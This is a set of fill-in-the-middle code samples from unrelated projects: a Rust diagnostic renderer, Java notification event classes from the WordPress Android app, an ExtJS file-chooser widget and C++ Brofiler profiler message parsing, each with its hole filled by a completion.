/// │ │ ^^^^^^ ------- blah blah /// snippet empty ── │ │ /// snippet note ── │ = blah blah /// snippet note ── │ = blah blah blah /// │ blah blah /// snippet note ── │ = blah blah blah /// │ blah blah /// empty ── │ /// ``` /// /// Filler text from http://www.cupcakeipsum.com pub struct Renderer<'writer, 'config> { writer: &'writer mut dyn WriteColor, config: &'config Config, } impl<'writer, 'config> Renderer<'writer, 'config> { /// Construct a renderer from the given writer and config. pub fn new( writer: &'writer mut dyn WriteColor, config: &'config Config, ) -> Renderer<'writer, 'config> { Renderer { writer, config } } fn chars(&self) -> &'config Chars { &self.config.chars } fn styles(&self) -> &'config Styles { &self.config.styles } /// Diagnostic header, with severity, code, and message. /// /// ```text /// error[E0001]: unexpected type in `+` application /// ``` pub fn render_header( &mut self, locus: Option<&Locus>, severity: Severity, code: Option<&str>, message: &str, ) -> Result<(), Error> { // Write locus // // ```text // test:2:9: // ``` if let Some(locus) = locus { self.snippet_locus(locus)?; write!(self, ": ")?; } // Write severity name // // ```text // error // ``` self.set_color(self.styles().header(severity))?; match severity { Severity::Bug => write!(self, "bug")?, Severity::Error => write!(self, "error")?, Severity::Warning => write!(self, "warning")?, Severity::Help => write!(self, "help")?, Severity::Note => write!(self, "note")?, } // Write error code // // ```text // [E0001] // ``` if let Some(code) = &code.filter(|code| !code.is_empty()) { write!(self, "[{}]", code)?; } // Write diagnostic message // // ```text // : unexpected type in `+` application // ``` self.set_color(&self.styles().header_message)?; write!(self, ": {}", message)?; self.reset()?; writeln!(self)?; Ok(()) } /// Empty line. pub fn render_empty(&mut self) -> Result<(), Error> { writeln!(self)?; Ok(()) } /// Top left border and locus. /// /// ```text /// ┌─ test:2:9 /// ``` pub fn render_snippet_start( &mut self, outer_padding: usize, locus: &Locus, ) -> Result<(), Error> { self.outer_gutter(outer_padding)?; self.set_color(&self.styles().source_border)?; write!(self, "{}", self.chars().snippet_start)?; self.reset()?; write!(self, " ")?; self.snippet_locus(locus)?; writeln!(self)?; Ok(()) } /// A line of source code. /// /// ```text /// 10 │ │ muffin. Halvah croissant candy canes bonbon candy. Apple pie jelly /// │ ╭─│─────────^ /// ``` pub fn render_snippet_source( &mut self, outer_padding: usize, line_number: usize, source: &str, severity: Severity, single_labels: &[SingleLabel<'_>], num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { // Trim trailing newlines, linefeeds, and null chars from source, if they exist. // FIXME: Use the number of trimmed placeholders when rendering single line carets let source = source.trim_end_matches(['\n', '\r', '\0'].as_ref()); // Write source line // // ```text // 10 │ │ muffin. Halvah croissant candy canes bonbon candy. 
Apple pie jelly // ``` { // Write outer gutter (with line number) and border self.outer_gutter_number(line_number, outer_padding)?; self.border_left()?; // Write inner gutter (with multi-line continuations on the left if necessary) let mut multi_labels_iter = multi_labels.iter().peekable(); for label_column in 0..num_multi_labels { match multi_labels_iter.peek() { Some((label_index, label_style, label)) if *label_index == label_column => { match label { MultiLabel::Top(start) if *start <= source.len() - source.trim_start().len() => { self.label_multi_top_left(severity, *label_style)?; } MultiLabel::Top(..) => self.inner_gutter_space()?, MultiLabel::Left | MultiLabel::Bottom(..) => { self.label_multi_left(severity, *label_style, None)?; } } multi_labels_iter.next(); } Some((_, _, _)) | None => self.inner_gutter_space()?, } } // Write source text write!(self, " ")?; let mut in_primary = false; for (metrics, ch) in self.char_metrics(source.char_indices()) { let column_range = metrics.byte_index..(metrics.byte_index + ch.len_utf8()); // Check if we are overlapping a primary label let is_primary = single_labels.iter().any(|(ls, range, _)| { *ls == LabelStyle::Primary && is_overlapping(range, &column_range) }) || multi_labels.iter().any(|(_, ls, label)| { *ls == LabelStyle::Primary && match label { MultiLabel::Top(start) => column_range.start >= *start, MultiLabel::Left => true, MultiLabel::Bottom(start, _) => column_range.end <= *start, } }); // Set the source color if we are in a primary label if is_primary && !in_primary { self.set_color(self.styles().label(severity, LabelStyle::Primary))?; in_primary = true; } else if !is_primary && in_primary { self.reset()?; in_primary = false; } match ch { '\t' => (0..metrics.unicode_width).try_for_each(|_| write!(self, " "))?, _ => write!(self, "{}", ch)?, } } if in_primary { self.reset()?; } writeln!(self)?; } // Write single labels underneath source // // ```text // │ - ---- ^^^ second mutable borrow occurs here // │ │ │ // │ │ first mutable borrow occurs here // │ first borrow later used by call // │ help: some help here // ``` if !single_labels.is_empty() { // Our plan is as follows: // // 1. Do an initial scan to find: // - The number of non-empty messages. // - The right-most start and end positions of labels. // - A candidate for a trailing label (where the label's message<|fim▁hole|> // is printed to the left of the caret). // 2. Check if the trailing label candidate overlaps another label - // if so we print it underneath the carets with the other labels. // 3. Print a line of carets, and (possibly) the trailing message // to the left. // 4. Print vertical lines pointing to the carets, and the messages // for those carets. // // We try our best avoid introducing new dynamic allocations, // instead preferring to iterate over the labels multiple times. It // is unclear what the performance tradeoffs are however, so further // investigation may be required. // The number of non-empty messages to print. 
let mut num_messages = 0; // The right-most start position, eg: // // ```text // -^^^^---- ^^^^^^^ // │ // right-most start position // ``` let mut max_label_start = 0; // The right-most end position, eg: // // ```text // -^^^^---- ^^^^^^^ // │ // right-most end position // ``` let mut max_label_end = 0; // A trailing message, eg: // // ```text // ^^^ second mutable borrow occurs here // ``` let mut trailing_label = None; for (label_index, label) in single_labels.iter().enumerate() { let (_, range, message) = label; if !message.is_empty() { num_messages += 1; } max_label_start = std::cmp::max(max_label_start, range.start); max_label_end = std::cmp::max(max_label_end, range.end); // This is a candidate for the trailing label, so let's record it. if range.end == max_label_end { if message.is_empty() { trailing_label = None; } else { trailing_label = Some((label_index, label)); } } } if let Some((trailing_label_index, (_, trailing_range, _))) = trailing_label { // Check to see if the trailing label candidate overlaps any of // the other labels on the current line. if single_labels .iter() .enumerate() .filter(|(label_index, _)| *label_index != trailing_label_index) .any(|(_, (_, range, _))| is_overlapping(trailing_range, range)) { // If it does, we'll instead want to render it below the // carets along with the other hanging labels. trailing_label = None; } } // Write a line of carets // // ```text // │ ^^^^^^ -------^^^^^^^^^-------^^^^^----- ^^^^ trailing label message // ``` self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; write!(self, " ")?; let mut previous_label_style = None; let placeholder_metrics = Metrics { byte_index: source.len(), unicode_width: 1, }; for (metrics, ch) in self .char_metrics(source.char_indices()) // Add a placeholder source column at the end to allow for // printing carets at the end of lines, eg: // // ```text // 1 │ Hello world! 
// │ ^ // ``` .chain(std::iter::once((placeholder_metrics, '\0'))) { // Find the current label style at this column let column_range = metrics.byte_index..(metrics.byte_index + ch.len_utf8()); let current_label_style = single_labels .iter() .filter(|(_, range, _)| is_overlapping(range, &column_range)) .map(|(label_style, _, _)| *label_style) .max_by_key(label_priority_key); // Update writer style if necessary if previous_label_style != current_label_style { match current_label_style { None => self.reset()?, Some(label_style) => { self.set_color(self.styles().label(severity, label_style))?; } } } let caret_ch = match current_label_style { Some(LabelStyle::Primary) => Some(self.chars().single_primary_caret), Some(LabelStyle::Secondary) => Some(self.chars().single_secondary_caret), // Only print padding if we are before the end of the last single line caret None if metrics.byte_index < max_label_end => Some(' '), None => None, }; if let Some(caret_ch) = caret_ch { // FIXME: improve rendering of carets between character boundaries (0..metrics.unicode_width).try_for_each(|_| write!(self, "{}", caret_ch))?; } previous_label_style = current_label_style; } // Reset style if it was previously set if previous_label_style.is_some() { self.reset()?; } // Write first trailing label message if let Some((_, (label_style, _, message))) = trailing_label { write!(self, " ")?; self.set_color(self.styles().label(severity, *label_style))?; write!(self, "{}", message)?; self.reset()?; } writeln!(self)?; // Write hanging labels pointing to carets // // ```text // │ │ │ // │ │ first mutable borrow occurs here // │ first borrow later used by call // │ help: some help here // ``` if num_messages > trailing_label.iter().count() { // Write first set of vertical lines before hanging labels // // ```text // │ │ │ // ``` self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; write!(self, " ")?; self.caret_pointers( severity, max_label_start, single_labels, trailing_label, source.char_indices(), )?; writeln!(self)?; // Write hanging labels pointing to carets // // ```text // │ │ first mutable borrow occurs here // │ first borrow later used by call // │ help: some help here // ``` for (label_style, range, message) in hanging_labels(single_labels, trailing_label).rev() { self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; write!(self, " ")?; self.caret_pointers( severity, max_label_start, single_labels, trailing_label, source .char_indices() .take_while(|(byte_index, _)| *byte_index < range.start), )?; self.set_color(self.styles().label(severity, *label_style))?; write!(self, "{}", message)?; self.reset()?; writeln!(self)?; } } } // Write top or bottom label carets underneath source // // ```text // │ ╰───│──────────────────^ woops // │ ╭─│─────────^ // ``` for (multi_label_index, (_, label_style, label)) in multi_labels.iter().enumerate() { let (label_style, range, bottom_message) = match label { MultiLabel::Left => continue, // no label caret needed // no label caret needed if this can be started in front of the line MultiLabel::Top(start) if *start <= source.len() - source.trim_start().len() => { continue } MultiLabel::Top(range) => (*label_style, range, None), MultiLabel::Bottom(range, message) => (*label_style, range, Some(message)), }; self.outer_gutter(outer_padding)?; self.border_left()?; // Write inner gutter. 
// // ```text // │ ╭─│───│ // ``` let mut underline = None; let mut multi_labels_iter = multi_labels.iter().enumerate().peekable(); for label_column in 0..num_multi_labels { match multi_labels_iter.peek() { Some((i, (label_index, ls, label))) if *label_index == label_column => { match label { MultiLabel::Left => { self.label_multi_left(severity, *ls, underline.map(|(s, _)| s))?; } MultiLabel::Top(..) if multi_label_index > *i => { self.label_multi_left(severity, *ls, underline.map(|(s, _)| s))?; } MultiLabel::Bottom(..) if multi_label_index < *i => { self.label_multi_left(severity, *ls, underline.map(|(s, _)| s))?; } MultiLabel::Top(..) if multi_label_index == *i => { underline = Some((*ls, VerticalBound::Top)); self.label_multi_top_left(severity, label_style)? } MultiLabel::Bottom(..) if multi_label_index == *i => { underline = Some((*ls, VerticalBound::Bottom)); self.label_multi_bottom_left(severity, label_style)?; } MultiLabel::Top(..) | MultiLabel::Bottom(..) => { self.inner_gutter_column(severity, underline)?; } } multi_labels_iter.next(); } Some((_, _)) | None => self.inner_gutter_column(severity, underline)?, } } // Finish the top or bottom caret match bottom_message { None => self.label_multi_top_caret(severity, label_style, source, *range)?, Some(message) => { self.label_multi_bottom_caret(severity, label_style, source, *range, message)? } } } Ok(()) } /// An empty source line, for providing additional whitespace to source snippets. /// /// ```text /// │ │ │ /// ``` pub fn render_snippet_empty( &mut self, outer_padding: usize, severity: Severity, num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; writeln!(self)?; Ok(()) } /// A broken source line, for labeling skipped sections of source. /// /// ```text /// · │ │ /// ``` pub fn render_snippet_break( &mut self, outer_padding: usize, severity: Severity, num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { self.outer_gutter(outer_padding)?; self.border_left_break()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; writeln!(self)?; Ok(()) } /// Additional notes. /// /// ```text /// = expected type `Int` /// found type `String` /// ``` pub fn render_snippet_note( &mut self, outer_padding: usize, message: &str, ) -> Result<(), Error> { for (note_line_index, line) in message.lines().enumerate() { self.outer_gutter(outer_padding)?; match note_line_index { 0 => { self.set_color(&self.styles().note_bullet)?; write!(self, "{}", self.chars().note_bullet)?; self.reset()?; } _ => write!(self, " ")?, } // Write line of message writeln!(self, " {}", line)?; } Ok(()) } /// Adds tab-stop aware unicode-width computations to an iterator over /// character indices. Assumes that the character indices begin at the start /// of the line. fn char_metrics( &self, char_indices: impl Iterator<Item = (usize, char)>, ) -> impl Iterator<Item = (Metrics, char)> { use unicode_width::UnicodeWidthChar; let tab_width = self.config.tab_width; let mut unicode_column = 0; char_indices.map(move |(byte_index, ch)| { let metrics = Metrics { byte_index, unicode_width: match (ch, tab_width) { ('\t', 0) => 0, // Guard divide-by-zero ('\t', _) => tab_width - (unicode_column % tab_width), (ch, _) => ch.width().unwrap_or(0), }, }; unicode_column += metrics.unicode_width; (metrics, ch) }) } /// Location focus. 
fn snippet_locus(&mut self, locus: &Locus) -> Result<(), Error> { write!( self, "{name}:{line_number}:{column_number}", name = locus.name, line_number = locus.location.line_number, column_number = locus.location.column_number, )?; Ok(()) } /// The outer gutter of a source line. fn outer_gutter(&mut self, outer_padding: usize) -> Result<(), Error> { write!(self, "{space: >width$} ", space = "", width = outer_padding)?; Ok(()) } /// The outer gutter of a source line, with line number. fn outer_gutter_number( &mut self, line_number: usize, outer_padding: usize, ) -> Result<(), Error> { self.set_color(&self.styles().line_number)?; write!( self, "{line_number: >width$}", line_number = line_number, width = outer_padding, )?; self.reset()?; write!(self, " ")?; Ok(()) } /// The left-hand border of a source line. fn border_left(&mut self) -> Result<(), Error> { self.set_color(&self.styles().source_border)?; write!(self, "{}", self.chars().source_border_left)?; self.reset()?; Ok(()) } /// The broken left-hand border of a source line. fn border_left_break(&mut self) -> Result<(), Error> { self.set_color(&self.styles().source_border)?; write!(self, "{}", self.chars().source_border_left_break)?; self.reset()?; Ok(()) } /// Write vertical lines pointing to carets. fn caret_pointers( &mut self, severity: Severity, max_label_start: usize, single_labels: &[SingleLabel<'_>], trailing_label: Option<(usize, &SingleLabel<'_>)>, char_indices: impl Iterator<Item = (usize, char)>, ) -> Result<(), Error> { for (metrics, ch) in self.char_metrics(char_indices) { let column_range = metrics.byte_index..(metrics.byte_index + ch.len_utf8()); let label_style = hanging_labels(single_labels, trailing_label) .filter(|(_, range, _)| column_range.contains(&range.start)) .map(|(label_style, _, _)| *label_style) .max_by_key(label_priority_key); let mut spaces = match label_style { None => 0..metrics.unicode_width, Some(label_style) => { self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().pointer_left)?; self.reset()?; 1..metrics.unicode_width } }; // Only print padding if we are before the end of the last single line caret if metrics.byte_index <= max_label_start { spaces.try_for_each(|_| write!(self, " "))?; } } Ok(()) } /// The left of a multi-line label. /// /// ```text /// │ /// ``` fn label_multi_left( &mut self, severity: Severity, label_style: LabelStyle, underline: Option<LabelStyle>, ) -> Result<(), Error> { match underline { None => write!(self, " ")?, // Continue an underline horizontally Some(label_style) => { self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_top)?; self.reset()?; } } self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_left)?; self.reset()?; Ok(()) } /// The top-left of a multi-line label. /// /// ```text /// ╭ /// ``` fn label_multi_top_left( &mut self, severity: Severity, label_style: LabelStyle, ) -> Result<(), Error> { write!(self, " ")?; self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_top_left)?; self.reset()?; Ok(()) } /// The bottom left of a multi-line label. /// /// ```text /// ╰ /// ``` fn label_multi_bottom_left( &mut self, severity: Severity, label_style: LabelStyle, ) -> Result<(), Error> { write!(self, " ")?; self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_bottom_left)?; self.reset()?; Ok(()) } /// Multi-line label top. 
/// /// ```text /// ─────────────^ /// ``` fn label_multi_top_caret( &mut self, severity: Severity, label_style: LabelStyle, source: &str, start: usize, ) -> Result<(), Error> { self.set_color(self.styles().label(severity, label_style))?; for (metrics, _) in self .char_metrics(source.char_indices()) .take_while(|(metrics, _)| metrics.byte_index < start + 1) { // FIXME: improve rendering of carets between character boundaries (0..metrics.unicode_width) .try_for_each(|_| write!(self, "{}", self.chars().multi_top))?; } let caret_start = match label_style { LabelStyle::Primary => self.config.chars.multi_primary_caret_start, LabelStyle::Secondary => self.config.chars.multi_secondary_caret_start, }; write!(self, "{}", caret_start)?; self.reset()?; writeln!(self)?; Ok(()) } /// Multi-line label bottom, with a message. /// /// ```text /// ─────────────^ expected `Int` but found `String` /// ``` fn label_multi_bottom_caret( &mut self, severity: Severity, label_style: LabelStyle, source: &str, start: usize, message: &str, ) -> Result<(), Error> { self.set_color(self.styles().label(severity, label_style))?; for (metrics, _) in self .char_metrics(source.char_indices()) .take_while(|(metrics, _)| metrics.byte_index < start) { // FIXME: improve rendering of carets between character boundaries (0..metrics.unicode_width) .try_for_each(|_| write!(self, "{}", self.chars().multi_bottom))?; } let caret_end = match label_style { LabelStyle::Primary => self.config.chars.multi_primary_caret_start, LabelStyle::Secondary => self.config.chars.multi_secondary_caret_start, }; write!(self, "{}", caret_end)?; if !message.is_empty() { write!(self, " {}", message)?; } self.reset()?; writeln!(self)?; Ok(()) } /// Writes an empty gutter space, or continues an underline horizontally. fn inner_gutter_column( &mut self, severity: Severity, underline: Option<Underline>, ) -> Result<(), Error> { match underline { None => self.inner_gutter_space(), Some((label_style, vertical_bound)) => { self.set_color(self.styles().label(severity, label_style))?; let ch = match vertical_bound { VerticalBound::Top => self.config.chars.multi_top, VerticalBound::Bottom => self.config.chars.multi_bottom, }; write!(self, "{0}{0}", ch)?; self.reset()?; Ok(()) } } } /// Writes an empty gutter space. fn inner_gutter_space(&mut self) -> Result<(), Error> { write!(self, " ")?; Ok(()) } /// Writes an inner gutter, with the left lines if necessary. fn inner_gutter( &mut self, severity: Severity, num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { let mut multi_labels_iter = multi_labels.iter().peekable(); for label_column in 0..num_multi_labels { match multi_labels_iter.peek() { Some((label_index, ls, label)) if *label_index == label_column => match label { MultiLabel::Left | MultiLabel::Bottom(..) => { self.label_multi_left(severity, *ls, None)?; multi_labels_iter.next(); } MultiLabel::Top(..) 
=> { self.inner_gutter_space()?; multi_labels_iter.next(); } }, Some((_, _, _)) | None => self.inner_gutter_space()?, } } Ok(()) } } impl<'writer, 'config> Write for Renderer<'writer, 'config> { fn write(&mut self, buf: &[u8]) -> io::Result<usize> { self.writer.write(buf) } fn flush(&mut self) -> io::Result<()> { self.writer.flush() } } impl<'writer, 'config> WriteColor for Renderer<'writer, 'config> { fn supports_color(&self) -> bool { self.writer.supports_color() } fn set_color(&mut self, spec: &ColorSpec) -> io::Result<()> { self.writer.set_color(spec) } fn reset(&mut self) -> io::Result<()> { self.writer.reset() } fn is_synchronous(&self) -> bool { self.writer.is_synchronous() } } struct Metrics { byte_index: usize, unicode_width: usize, } /// Check if two ranges overlap fn is_overlapping(range0: &Range<usize>, range1: &Range<usize>) -> bool { let start = std::cmp::max(range0.start, range1.start); let end = std::cmp::min(range0.end, range1.end); start < end } /// For prioritizing primary labels over secondary labels when rendering carets. fn label_priority_key(label_style: &LabelStyle) -> u8 { match label_style { LabelStyle::Secondary => 0, LabelStyle::Primary => 1, } } /// Return an iterator that yields the labels that require hanging messages /// rendered underneath them. fn hanging_labels<'labels, 'diagnostic>( single_labels: &'labels [SingleLabel<'diagnostic>], trailing_label: Option<(usize, &'labels SingleLabel<'diagnostic>)>, ) -> impl 'labels + DoubleEndedIterator<Item = &'labels SingleLabel<'diagnostic>> { single_labels .iter() .enumerate() .filter(|(_, (_, _, message))| !message.is_empty()) .filter(move |(i, _)| trailing_label.map_or(true, |(j, _)| *i != j)) .map(|(_, label)| label) }<|fim▁end|>
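Two small pieces of the renderer.rs logic above are easy to check in isolation: half-open range overlap, and the tab-stop-aware column width `tab_width - (column % tab_width)`. A Python sketch, with a constant width of 1 standing in for the real unicode_width lookup:

```python
def is_overlapping(r0, r1):
    # half-open ranges overlap iff the later start precedes the earlier end
    return max(r0[0], r1[0]) < min(r0[1], r1[1])

def char_metrics(line, tab_width=4):
    """Yield (byte_index, display_width); tabs expand to the next tab stop."""
    column = 0
    byte_index = 0
    for ch in line:
        if ch == '\t':
            width = 0 if tab_width == 0 else tab_width - (column % tab_width)
        else:
            width = 1  # renderer.rs uses the character's real unicode width here
        yield byte_index, width
        column += width
        byte_index += len(ch.encode('utf-8'))

assert is_overlapping((0, 4), (3, 9)) and not is_overlapping((0, 3), (3, 9))
assert [w for _, w in char_metrics('a\tb')] == [1, 3, 1]
```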
<|file_name|>NotificationEvents.java<|end_file_name|><|fim▁begin|>package org.wordpress.android.ui.notifications; import com.android.volley.VolleyError; import org.wordpress.android.models.Note; import java.util.List; public class NotificationEvents { public static class NotificationsChanged { final public boolean hasUnseenNotes; public NotificationsChanged() { this.hasUnseenNotes = false; } public NotificationsChanged(boolean hasUnseenNotes) { this.hasUnseenNotes = hasUnseenNotes; } } public static class NoteModerationFailed {} public static class NoteModerationStatusChanged { final boolean isModerating; final String noteId; public NoteModerationStatusChanged(String noteId, boolean isModerating) { this.noteId = noteId; this.isModerating = isModerating; } }<|fim▁hole|> this.noteId = noteId; } } public static class NoteVisibilityChanged { final boolean isHidden; final String noteId; public NoteVisibilityChanged(String noteId, boolean isHidden) { this.noteId = noteId; this.isHidden = isHidden; } } public static class NotificationsSettingsStatusChanged { final String mMessage; public NotificationsSettingsStatusChanged(String message) { mMessage = message; } public String getMessage() { return mMessage; } } public static class NotificationsUnseenStatus { final public boolean hasUnseenNotes; public NotificationsUnseenStatus(boolean hasUnseenNotes) { this.hasUnseenNotes = hasUnseenNotes; } } public static class NotificationsRefreshCompleted { final List<Note> notes; public NotificationsRefreshCompleted(List<Note> notes) { this.notes = notes; } } public static class NotificationsRefreshError { VolleyError error; public NotificationsRefreshError(VolleyError error) { this.error = error; } public NotificationsRefreshError() { } } }<|fim▁end|>
public static class NoteLikeStatusChanged { final String noteId; public NoteLikeStatusChanged(String noteId) {
<|file_name|>vyatta-filechooser.js<|end_file_name|><|fim▁begin|>var FileChooser = function(config) { // Setup a variable for the current directory this.current_directory = null; /* ---- Begin side_navbar tree --- */ this.tree = new Ext.tree.TreePanel( { region: 'west', width: 150, minSize: 150, <|fim▁hole|> enableDD: true, containerScroll: true, rootVisible:true, root: new Ext.tree.AsyncTreeNode( { text: 'Files', draggable: false, id: 'source', expanded: true }), listeners: { scope: this, 'click': function(node, e) { this.current_directory = node.attributes.url; this.ds.load({ params: {directory: node.attributes.url}}); } } }); // Add a tree sorter in folder mode new Ext.tree.TreeSorter(this.tree, {folderSort: true}); /* ---- End side_navbar tree --- */ /* ---- Begin grid --- */ this.ds = new Ext.data.GroupingStore( { url: 'js/grid_data.json.php', method: 'POST', autoLoad: true, sortInfo: {field: 'name', direction: 'ASC'}, reader: new Ext.data.JsonReader( { root: 'data', totalProperty: 'count' }, [ {name: 'name'}, {name: 'size', type: 'float'}, {name: 'type'}, {name: 'relative_path'}, {name: 'full_path'}, {name: 'web_path'} ]) }); this.cm = new Ext.grid.ColumnModel( [ {header: 'Name', dataIndex: 'name', sortable: true}, {header: 'Size', dataIndex: 'size', sortable: true, renderer: Ext.util.Format.fileSize}, {header: 'Type', dataIndex: 'type', sortable: true}, {header: 'Relative Path', dataIndex: 'relative_path', sortable: true, hidden: true}, {header: 'Full Path', dataIndex: 'full_path', sortable: true, hidden: true}, {header: 'Web Path', dataIndex: 'web_path', sortable: true, hidden: true} ]); this.grid = new Ext.grid.GridPanel( { region: 'center', border: false, view: new Ext.grid.GroupingView( { emptyText: 'This folder contains no files.', forceFit: true, showGroupName: false, enableNoGroups: true }), ds: this.ds, cm: this.cm, listeners: { scope: this, 'rowdblclick': this.doCallback } }); /* ---- End grid --- */ /* ---- Begin window --- */ this.popup = new Ext.Window( { id: 'FileChooser', title: 'Choose A File', width: config.width, height: config.height, minWidth: config.width, minHeight: config.height, layout: 'border', items: [ this.tree, this.grid ], buttons: [ { text: 'Ok', scope: this, handler: this.doCallback }, { text: 'Cancel', scope: this, handler: function() { this.popup.hide(); } }] }); /* ---- End window --- */ }; FileChooser.prototype = { show : function(el, callback) { if (Ext.type(el) == 'object') this.showEl = el.getEl(); else this.showEl = el; this.el = el; this.popup.show(this.showEl); this.callback = callback; }, doCallback : function() { var row = this.grid.getSelectionModel().getSelected(); var callback = this.callback; var el = this.el; this.popup.close(); if (row && callback) { var data = row.data.web_path; callback(el, data); } } }; function FileBrowser(fieldName, url, win) { var chooser = new FileChooser({width: 500, height:400}); chooser.show(fieldName, function(el, data) { win.document.getElementById(el).value = data; }); }<|fim▁end|>
maxSize: 250, animate: true, loader: new Ext.tree.TreeLoader({dataUrl: 'tree_data.json.php' }),
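Each row in this dump is a prompt (prefix, hole sentinel, suffix, wrapped in begin/end sentinels) plus a completion holding the hole's contents; here the completion's maxSize/animate/loader settings slot back between minSize and enableDD. A sketch of the splice, using ASCII stand-ins for the dataset's actual sentinel tokens:

```python
BEGIN, HOLE, END = "<fim_begin>", "<fim_hole>", "<fim_end>"  # stand-ins

def reassemble(prompt, completion):
    """Recover the original file text from one (prompt, completion) row."""
    body = prompt.split(BEGIN, 1)[1].rsplit(END, 1)[0]
    prefix, suffix = body.split(HOLE, 1)
    return prefix + completion + suffix

row = (BEGIN + "minSize: 150, " + HOLE + " enableDD: true," + END,
       "maxSize: 250, animate: true,")
assert reassemble(*row) == "minSize: 150, maxSize: 250, animate: true, enableDD: true,"
```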
<|file_name|>Message.cpp<|end_file_name|><|fim▁begin|>#include "Common.h" #include "Core.h" #include "Event.h" #include "Message.h" #include "ProfilerServer.h" #include "EventDescriptionBoard.h" namespace Brofiler { //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// struct MessageHeader { uint32 mark; uint32 length; static const uint32 MESSAGE_MARK = 0xB50FB50F; bool IsValid() const { return mark == MESSAGE_MARK; } MessageHeader() : mark(0), length(0) {} }; //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// class MessageFactory { typedef IMessage* (*MessageCreateFunction)(InputDataStream& str); MessageCreateFunction factory[IMessage::COUNT]; template<class T> void RegisterMessage() { factory[T::GetMessageType()] = T::Create; } MessageFactory() { memset(&factory[0], 0, sizeof(factory)); RegisterMessage<StartMessage>(); RegisterMessage<StopMessage>(); RegisterMessage<TurnSamplingMessage>(); for (uint32 msg = 0; msg < IMessage::COUNT; ++msg) { BRO_ASSERT(factory[msg] != nullptr, "Message is not registered to factory"); } } public: static MessageFactory& Get() { static MessageFactory instance; return instance; } IMessage* Create(InputDataStream& str) { MessageHeader header; str.Read(header); size_t length = str.Length(); int32 messageType = IMessage::COUNT; str >> messageType; BRO_VERIFY(0 <= messageType && messageType < IMessage::COUNT && factory[messageType] != nullptr, "Unknown message type!", return nullptr) IMessage* result = factory[messageType](str); if (header.length + str.Length() != length) { BRO_FAILED("Message Stream is corrupted! Invalid Protocol?") return nullptr; } return result; } }; //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// OutputDataStream& operator<<(OutputDataStream& os, const DataResponse& val) { return os << val.version << (uint32)val.type; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* IMessage::Create(InputDataStream& str) { MessageHeader header; while (str.Peek(header)) { if (header.IsValid()) { if (str.Length() < header.length + sizeof(MessageHeader)) break; // Not enough data yet return MessageFactory::Get().Create(str); } else { // Some garbage in the stream? 
str.Skip(1); } } return nullptr; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// void StartMessage::Apply() { <|fim▁hole|> Core::Get().StartSampling(); } } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* StartMessage::Create(InputDataStream&) { return new StartMessage(); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// void StopMessage::Apply() { Core& core = Core::Get(); core.Activate(false); core.DumpFrames(); core.DumpSamplingData(); Server::Get().Send(DataResponse::NullFrame, OutputDataStream::Empty); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* StopMessage::Create(InputDataStream&) { return new StopMessage(); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* TurnSamplingMessage::Create(InputDataStream& stream) { TurnSamplingMessage* msg = new TurnSamplingMessage(); stream >> msg->index; stream >> msg->isSampling; return msg; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// void TurnSamplingMessage::Apply() { EventDescriptionBoard::Get().SetSamplingFlag(index, isSampling != 0); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// }<|fim▁end|>
Core::Get().Activate(true); if (EventDescriptionBoard::Get().HasSamplingEvents()) {
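IMessage::Create above resynchronizes a corrupt stream by skipping one byte at a time until a header with the magic mark lines up, and waits when a frame is incomplete. A Python sketch of the same scan; the little-endian byte order is an assumption (the C++ reads the struct in host order):

```python
import struct

MESSAGE_MARK = 0xB50FB50F
HEADER_SIZE = 8  # two uint32s: mark, length

def next_message(buf):
    """Return (payload, remaining), or (None, remaining) if more data is needed."""
    offset = 0
    while len(buf) - offset >= HEADER_SIZE:
        mark, length = struct.unpack_from('<II', buf, offset)
        if mark != MESSAGE_MARK:
            offset += 1  # garbage in the stream: resync byte by byte
            continue
        end = offset + HEADER_SIZE + length
        if len(buf) < end:
            break        # not enough data yet
        return buf[offset + HEADER_SIZE:end], buf[end:]
    return None, buf[offset:]

frame = b'\xff' + struct.pack('<II', MESSAGE_MARK, 3) + b'abc'
payload, rest = next_message(frame)
assert payload == b'abc' and rest == b''
```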
